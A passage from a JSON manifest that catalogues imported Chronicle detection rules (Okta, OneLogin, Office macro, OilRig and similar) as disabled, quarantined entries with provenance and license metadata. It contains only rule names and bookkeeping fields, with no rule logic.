"imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/o365-recently-created-entra-id-user-assigned-roles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "o365_recently_created_entra_id_user_assigned_roles", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/o365_recently_created_entra_id_user_assigned_roles.yaral" } }, { "id": "chronicle-detection-rules-offensive-tool-maliciousdllgenerator-dll-side-loadingsysmon", "type": "detection", "name": "offensive_tool_maliciousdllgenerator_dll_side_loadingsysmon", "description": "offensive_tool_maliciousdllgenerator_dll_side_loadingsysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/offensive-tool-maliciousdllgenerator-dll-side-loadingsysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "offensive_tool_maliciousdllgenerator_dll_side_loadingsysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/offensive_tool_maliciousdllgenerator__dll_side_loading_sysmon.yaral" } }, { "id": "chronicle-detection-rules-office-applications-suspicious-process-activity", "type": "detection", "name": "office_applications_suspicious_process_activity", "description": "office_applications_suspicious_process_activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/office-applications-suspicious-process-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "office_applications_suspicious_process_activity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/office_applications_suspicious_process_activity.yaral" } }, { "id": "chronicle-detection-rules-office-macro-starts-cmd", "type": "detection", "name": "office_macro_starts_cmd", "description": "office_macro_starts_cmd", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/office-macro-starts-cmd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "office_macro_starts_cmd", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/office_macro_starts_cmd.yaral" } }, { "id": "chronicle-detection-rules-office-starup-folder-persistance", "type": "detection", "name": "office_starup_folder_persistance", "description": "office_starup_folder_persistance", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/office-starup-folder-persistance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "office_starup_folder_persistance", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/office_starup_folder_persistance.yaral" } }, { "id": "chronicle-detection-rules-oilirgs-rdat-backdoor-sysmon-detection", "type": "detection", "name": "oilirgs_rdat_backdoor_sysmon_detection", "description": "oilirgs_rdat_backdoor_sysmon_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oilirgs-rdat-backdoor-sysmon-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oilirgs_rdat_backdoor_sysmon_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/oilirg_s__rdat__backdoor__sysmon_detection.yaral" } }, { "id": "chronicle-detection-rules-oilrig", "type": "detection", "name": "oilrig", "description": "oilrig", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oilrig.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oilrig", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/oilrig_part_1.yaral" } }, { "id": "chronicle-detection-rules-oilrig-helminth-sysmon-behavior-historic-indicators", "type": "detection", "name": "oilrig_helminth_sysmon_behavior_historic_indicators", "description": "oilrig_helminth_sysmon_behavior_historic_indicators", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oilrig-helminth-sysmon-behavior-historic-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oilrig_helminth_sysmon_behavior_historic_indicators", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/oilrig_helminth__sysmon_behavior___historic_indicators.yaral" } }, { "id": "chronicle-detection-rules-oilrig-neuron-sysmon-behavior", "type": "detection", "name": "oilrig_neuron_sysmon_behavior", "description": "oilrig_neuron_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oilrig-neuron-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oilrig_neuron_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/oilrig_neuron__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-oilrig-part-1", "type": "detection", "name": "oilrig_part_1", "description": "oilrig_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/oilrig-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "oilrig_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/oilrig_part_2.yaral" } }, { "id": "chronicle-detection-rules-okta-mfa-brute-force-attack", "type": "detection", "name": "okta_mfa_brute_force_attack", "description": "okta_mfa_brute_force_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-mfa-brute-force-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_mfa_brute_force_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_mfa_brute_force_attack.yaral" } }, { "id": "chronicle-detection-rules-okta-mismatch-between-source-and-response-for-verify-push-request", "type": "detection", "name": "okta_mismatch_between_source_and_response_for_verify_push_request", "description": "okta_mismatch_between_source_and_response_for_verify_push_request", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-mismatch-between-source-and-response-for-verify-push-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_mismatch_between_source_and_response_for_verify_push_request", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_mismatch_between_source_and_response_for_verify_push_request.yaral" } }, { "id": "chronicle-detection-rules-okta-multiple-failed-requests-to-access-applications", "type": "detection", "name": "okta_multiple_failed_requests_to_access_applications", "description": "okta_multiple_failed_requests_to_access_applications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-multiple-failed-requests-to-access-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_multiple_failed_requests_to_access_applications", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_multiple_failed_requests_to_access_applications.yaral" } }, { "id": "chronicle-detection-rules-okta-multiple-users-logins-with-invalid-credentials-from-the-same-ip", "type": "detection", "name": "okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip", "description": "okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-multiple-users-logins-with-invalid-credentials-from-the-same-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip.yaral" } }, { "id": "chronicle-detection-rules-okta-new-api-token-created", "type": "detection", "name": "okta_new_api_token_created", "description": "okta_new_api_token_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-new-api-token-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_new_api_token_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_new_api_token_created.yaral" } }, { "id": "chronicle-detection-rules-okta-phishing-detection-with-fastpass-origin-check", "type": "detection", "name": "okta_phishing_detection_with_fastpass_origin_check", "description": "okta_phishing_detection_with_fastpass_origin_check", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-phishing-detection-with-fastpass-origin-check.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_phishing_detection_with_fastpass_origin_check", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_phishing_detection_with_fastpass_origin_check.yaral" } }, { "id": "chronicle-detection-rules-okta-successful-high-risk-user-logins", "type": "detection", "name": "okta_successful_high_risk_user_logins", "description": "okta_successful_high_risk_user_logins", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-successful-high-risk-user-logins.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_successful_high_risk_user_logins", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_successful_high_risk_user_logins.yaral" } }, { "id": "chronicle-detection-rules-okta-suspicious-use-of-a-session-cookie", "type": "detection", "name": "okta_suspicious_use_of_a_session_cookie", "description": "okta_suspicious_use_of_a_session_cookie", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-suspicious-use-of-a-session-cookie.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_suspicious_use_of_a_session_cookie", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_suspicious_use_of_a_session_cookie.yaral" } }, { "id": "chronicle-detection-rules-okta-threatinsight-login-failure-with-high-unknown-users", "type": "detection", "name": "okta_threatinsight_login_failure_with_high_unknown_users", "description": "okta_threatinsight_login_failure_with_high_unknown_users", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-threatinsight-login-failure-with-high-unknown-users.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_threatinsight_login_failure_with_high_unknown_users", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_threatinsight_login_failure_with_high_unknown_users.yaral" } }, { "id": "chronicle-detection-rules-okta-threatinsight-suspected-brute-force-attack", "type": "detection", "name": "okta_threatinsight_suspected_brute_force_attack", "description": "okta_threatinsight_suspected_brute_force_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-threatinsight-suspected-brute-force-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_threatinsight_suspected_brute_force_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_threatinsight_suspected_brute_force_attack.yaral" } }, { "id": "chronicle-detection-rules-okta-threatinsight-suspected-password-spray-attack", "type": "detection", "name": "okta_threatinsight_suspected_password_spray_attack", "description": "okta_threatinsight_suspected_password_spray_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-threatinsight-suspected-password-spray-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_threatinsight_suspected_password_spray_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_threatinsight_suspected_password_spray_attack.yaral" } }, { "id": "chronicle-detection-rules-okta-threatinsight-targeted-brute-force-attack", "type": "detection", "name": "okta_threatinsight_targeted_brute_force_attack", "description": "okta_threatinsight_targeted_brute_force_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-threatinsight-targeted-brute-force-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_threatinsight_targeted_brute_force_attack", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_threatinsight_targeted_brute_force_attack.yaral" } }, { "id": "chronicle-detection-rules-okta-user-account-lockout", "type": "detection", "name": "okta_user_account_lockout", "description": "okta_user_account_lockout", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-account-lockout.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_account_lockout", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_account_lockout.yaral" } }, { "id": "chronicle-detection-rules-okta-user-failed-number-challenge-during-push-notification", "type": "detection", "name": "okta_user_failed_number_challenge_during_push_notification", "description": "okta_user_failed_number_challenge_during_push_notification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-failed-number-challenge-during-push-notification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_failed_number_challenge_during_push_notification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_failed_number_challenge_during_push_notification.yaral" } }, { "id": "chronicle-detection-rules-okta-user-login-out-of-hours", "type": "detection", "name": "okta_user_login_out_of_hours", "description": "okta_user_login_out_of_hours", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-login-out-of-hours.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_login_out_of_hours", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_login_out_of_hours.yaral" } }, { "id": "chronicle-detection-rules-okta-user-logins-from-multiple-cities", "type": "detection", "name": "okta_user_logins_from_multiple_cities", "description": "okta_user_logins_from_multiple_cities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-logins-from-multiple-cities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_logins_from_multiple_cities", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_logins_from_multiple_cities.yaral" } }, { "id": "chronicle-detection-rules-okta-user-password-and-mfa-factor-reset-or-deactivated", "type": "detection", "name": "okta_user_password_and_mfa_factor_reset_or_deactivated", "description": "okta_user_password_and_mfa_factor_reset_or_deactivated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-password-and-mfa-factor-reset-or-deactivated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_password_and_mfa_factor_reset_or_deactivated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_password_and_mfa_factor_reset_or_deactivated.yaral" } }, { "id": "chronicle-detection-rules-okta-user-rejected-multiple-push-notifications", "type": "detection", "name": "okta_user_rejected_multiple_push_notifications", "description": "okta_user_rejected_multiple_push_notifications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-rejected-multiple-push-notifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_rejected_multiple_push_notifications", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_rejected_multiple_push_notifications.yaral" } }, { "id": "chronicle-detection-rules-okta-user-suspicious-activity-reported", "type": "detection", "name": "okta_user_suspicious_activity_reported", "description": "okta_user_suspicious_activity_reported", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/okta-user-suspicious-activity-reported.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "okta_user_suspicious_activity_reported", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/okta/okta_user_suspicious_activity_reported.yaral" } }, { "id": "chronicle-detection-rules-ole-controls-registered-via-regsvr32exe-sysmon-behavior", "type": "detection", "name": "ole_controls_registered_via_regsvr32exe_sysmon_behavior", "description": "ole_controls_registered_via_regsvr32exe_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ole-controls-registered-via-regsvr32exe-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ole_controls_registered_via_regsvr32exe_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ole_controls_registered_via_regsvr32_exe__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-olympic-destroyer-detector", "type": "detection", "name": "olympic_destroyer_detector", "description": "olympic_destroyer_detector", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/olympic-destroyer-detector.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "olympic_destroyer_detector", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/olympic_destroyer_detector.yaral" } }, { "id": "chronicle-detection-rules-onelogin-multiple-users-assumed", "type": "detection", "name": "onelogin_multiple_users_assumed", "description": "onelogin_multiple_users_assumed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-multiple-users-assumed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "onelogin_multiple_users_assumed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_multiple_users_assumed.yaral" } }, { "id": "chronicle-detection-rules-onelogin-multiple-users-login-failures-from-the-same-ip", "type": "detection", "name": "onelogin_multiple_users_login_failures_from_the_same_ip", "description": "onelogin_multiple_users_login_failures_from_the_same_ip", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-multiple-users-login-failures-from-the-same-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "onelogin_multiple_users_login_failures_from_the_same_ip", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/onelogin/onelogin_multiple_users_login_failures_from_the_same_ip.yaral" } }, { "id": "chronicle-detection-rules-onelogin-otp-brute-force-attack", "type": "detection", "name": "onelogin_otp_brute_force_attack", "description": "onelogin_otp_brute_force_attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/onelogin-otp-brute-force-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 